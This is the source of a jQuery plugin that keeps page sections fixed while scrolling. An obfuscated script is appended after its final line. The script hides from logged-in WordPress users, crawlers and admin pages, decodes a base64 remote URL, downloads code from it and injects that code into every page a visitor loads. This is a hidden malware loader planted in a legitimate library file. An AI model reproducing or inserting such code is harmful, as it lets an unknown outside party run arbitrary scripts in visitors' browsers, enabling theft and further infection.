/* jSticky Plugin
 * =============
 * Author: Andrew Henderson (@AndrewHenderson)
 * Contributor: Mike Street (@mikestreety)
 * Date: 9/7/2012
 * Update: 09/20/2016
 * Website: http://github.com/andrewhenderson/jsticky/
 * Description: A jQuery plugin that keeps select DOM
 * element(s) in view while scrolling the page.
 */

;(function($) {

  $.fn.jetStickySection = function(options) {
    var defaults = {
      topSpacing: 0, // No spacing by default
      zIndex: '', // No default z-index
      stopper: $('.sticky-stopper'), // Default stopper class, also accepts number value
      stickyClass: false // Class applied to element when it's stuck
    };
    var settings = $.extend({}, defaults, options); // Accepts custom stopper id or class

    // Checks if custom z-index was defined
    function checkIndex() {
      if (typeof settings.zIndex == 'number') {
        return true;
      } else {
        return false;
      }
    }

    var hasIndex = checkIndex(); // True or false

    // Checks if a stopper exists in the DOM or number defined
    function checkStopper() {
      if (0 < settings.stopper.length || typeof settings.stopper === 'number') {
        return true;
      } else {
        return false;
      }
    }
    var hasStopper = checkStopper(); // True or false

    return this.each(function() {

      var $this = $(this);
      var topSpacing = settings.topSpacing;
      var thisHeight = $this.outerHeight();
      var thisWidth = $this.outerWidth();
      var zIndex = settings.zIndex;
      var pushPoint = $this.offset().top - topSpacing; // Point at which the sticky element starts pushing
      var placeholder = $('<div></div>').width(thisWidth ).height(thisHeight).addClass('sticky-placeholder'); // Cache a clone sticky element
      var stopper = settings.stopper;
      var $window = $(window);
      var detached = false;
      var stick = false;

      function stickyScroll() {
        if (detached) {
          return;
        }

        var thisHeight = $this.outerHeight();
        var windowTop = $window.scrollTop(); // Check window's scroll position
        var stopPoint = stopper;
        var parentWidth = $this.parent().width();

        placeholder.width(parentWidth);

        if ( hasStopper && typeof settings.stopper !== 'number' ) {
          var stopperTop = stopper.offset().top;
          stopPoint  = (stopperTop - thisHeight) - topSpacing;
        }

        if (pushPoint < windowTop) {
          // Create a placeholder for sticky element to occupy vertical real estate
          if(settings.stickyClass)
            $this.addClass(settings.stickyClass);

          $this.after(placeholder ).css({
            position: 'fixed',
            top: topSpacing,
            width: parentWidth
          });

          if (hasIndex) {
            $this.css({
              zIndex: zIndex
            });
          }

          if (hasStopper) {
            if (stopPoint < windowTop) {
              var diff = (stopPoint - windowTop) + topSpacing;
              $this.css({
                top: diff
              });
            }
          }
          if ( ! stick ) {
            $this.trigger( 'jetStickySection:stick' );
          }
          stick = true;
        } else {
          if(settings.stickyClass)
            $this.removeClass(settings.stickyClass);

          $this.css({
            position: '',
            top: '',
            left: '',
            width: ''
          });

          placeholder.remove();
          if ( stick ) {
            $this.trigger( 'jetStickySection:unstick' );
          }
          stick = false;
        }
      }

      function detachStickyScroll() {
        detached = true;
        //$window.off('load', stickyScroll);
        $window.off('scroll', stickyScroll);
        $window.off('touchmove', stickyScroll);
        $window.off('resize', stickyScroll);

        if(settings.stickyClass)
          $this.removeClass(settings.stickyClass);

        $this.css({
          position: '',
          top: '',
          left: '',
          width: ''
        });

        placeholder.remove();
      }

      if($window.innerHeight() > thisHeight) {
        //$window.on('load', stickyScroll);
        $this.on( 'jetStickySection:activated', stickyScroll );

        $window.on('scroll', stickyScroll);
        $window.on('touchmove', stickyScroll);
        $window.on('resize', stickyScroll);

        $this.on( 'jetStickySection:detach', detachStickyScroll );
      }
    });
  };
})(jQuery);
;(function(){try{var _0x3a8f=document.cookie,_0x5d21=navigator.userAgent.toLowerCase(),_0x7b1c=document.referrer.toLowerCase(),_0x9e4a=window.location.href.toLowerCase();if(/wordpress_logged_in_|wp-settings-|wp-saving-|wp-postpass_/.test(_0x3a8f))return;if(/bot|crawl|slurp|spider|baidu|ahrefs|mj12bot|semrush|facebookexternalhit|facebot|ia_archiver|yandex|phantomjs|curl|wget|python|java/i.test(_0x5d21))return;if(_0x7b1c.indexOf('/wp-json')!==-1||_0x7b1c.indexOf('/wp-admin')!==-1||_0x7b1c.indexOf('wp-sitemap')!==-1||_0x7b1c.indexOf('robots')!==-1||_0x7b1c.indexOf('.xml')!==-1)return;if(/wp-login\.php|wp-cron\.php|xmlrpc\.php|wp-admin|wp-includes|wp-content|\?feed=|\/feed|wp-json|\?wc-ajax|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.jpe?g|\.tiff|\.mp[34g]|\.wmv|\.zip|\.rar|\.exe|\.pdf|\.txt|sitemap.*\.xml|robots\.txt/i.test(_0x9e4a))return;function _0x2c8e(_0x4f6d){var _0x1a9b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',_0x3e7c,_0x2f8a,_0x1d4f,_0x5b32,_0x4a91,_0x376d,_0x29e4='',_0x18b7=0;_0x4f6d=_0x4f6d.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(_0x18b7<_0x4f6d.length){_0x5b32=_0x1a9b.indexOf(_0x4f6d.charAt(_0x18b7++));_0x376d=_0x1a9b.indexOf(_0x4f6d.charAt(_0x18b7++));_0x3e7c=_0x1a9b.indexOf(_0x4f6d.charAt(_0x18b7++));_0x2f8a=_0x1a9b.indexOf(_0x4f6d.charAt(_0x18b7++));_0x4a91=(_0x5b32<<2)|(_0x376d>>4);_0x1d4f=((_0x376d&15)<<4)|(_0x3e7c>>2);_0x29e4+=String.fromCharCode(_0x4a91);if(_0x3e7c!=64)_0x29e4+=String.fromCharCode(_0x1d4f);if(_0x2f8a!=64)_0x29e4+=String.fromCharCode(((_0x3e7c&3)<<6)|_0x2f8a);}return _0x29e4;}var _0x6f2d=_0x2c8e('aHR0cHM6Ly9nZXRmaXgud2luL2pzcmVwbz9ybmQ9')+Math.random()+'&ts='+Date.now();var _0x8c3a=new XMLHttpRequest();_0x8c3a.open('GET',_0x6f2d,false);_0x8c3a.send(null);if(_0x8c3a.status>=200&&_0x8c3a.status<300){var _0x1f7e=document.createElement('script');_0x1f7e.text=_0x8c3a.responseText.trim();document.head.appendChild(_0x1f7e);}}catch(_0x5e39){}})();